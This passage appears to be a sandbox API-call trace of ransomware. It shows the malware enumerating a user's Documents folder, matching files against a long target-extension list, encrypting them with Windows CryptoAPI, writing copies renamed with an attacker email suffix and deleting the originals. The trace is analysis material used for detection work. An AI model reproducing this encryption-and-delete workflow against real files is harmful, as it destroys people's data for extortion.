	[0185.160] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx") returned="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx"
	[0185.160] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx") returned 49
	[0185.160] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.161] StrStrW (lpFirst=".xlsx", lpSrch=".") returned=".xlsx"
	[0185.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.162] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xlsx") returned=".xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.162] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.163] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.163] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.164] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x27a5, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x27a5, lpOverlapped=0x0) returned 1
	[0185.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.170] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0185.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.172] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.172] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.172] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.173] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0185.173] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.173] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x27a5, dwBufLen=0x27a5 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x27b0) returned 1
	[0185.173] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.174] RtlMoveMemory (in: Destination=0xfdf930, Source=0xfdd180, Length=0x27a5 | out: Destination=0xfdf930) 
	[0185.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.174] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf930*, pdwDataLen=0x18bc0c*=0x27a5, dwBufLen=0x27b0 | out: pbData=0xfdf930*, pdwDataLen=0x18bc0c*=0x27b0) returned 1
	[0185.174] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.175] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0185.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.175] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0185.175] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.175] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0185.175] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.176] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.176] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.176] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.177] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 91
	[0185.177] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.178] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdf930*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdf930*, lpNumberOfBytesWritten=0x18c068*=0x27b0, lpOverlapped=0x0) returned 1
	[0185.181] CloseHandle (hObject=0x2c0) returned 1
	[0185.181] CloseHandle (hObject=0x384) returned 1
	[0185.181] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx")) returned 1
	[0185.274] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\7pmvrzg zr y.xlsx")) returned 0
	[0185.274] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22dbf9f0, ftCreationTime.dwHighDateTime=0x1d96aef, ftLastAccessTime.dwLowDateTime=0x7dc8cb50, ftLastAccessTime.dwHighDateTime=0x1d96d9b, ftLastWriteTime.dwLowDateTime=0x7dc8cb50, ftLastWriteTime.dwHighDateTime=0x1d96d9b, nFileSizeHigh=0x0, nFileSizeLow=0x2e92, dwReserved0=0x0, dwReserved1=0x0, cFileName="CBJpukd2xJGFv_Y57goc.pptx", cAlternateFileName="CBJPUK~1.PPT")) returned 1
	[0185.274] lstrcmpW (lpString1="CBJpukd2xJGFv_Y57goc.pptx", lpString2="..") returned 1
	[0185.274] lstrcmpW (lpString1="CBJpukd2xJGFv_Y57goc.pptx", lpString2=".") returned 1
	[0185.275] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.275] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="CBJpukd2xJGFv_Y57goc.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\CBJpukd2xJGFv_Y57goc.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\CBJpukd2xJGFv_Y57goc.pptx"
	[0185.275] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\CBJpukd2xJGFv_Y57goc.pptx") returned 57
	[0185.275] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.275] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\CBJpukd2xJGFv_Y57goc.pptx", cchLength=0x39 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx") returned 0x39
	[0185.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.275] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.276] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx") returned="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx"
	[0185.276] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\cbjpukd2xjgfv_y57goc.pptx") returned 57
	[0185.276] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.276] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.277] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0185.277] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.277] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.w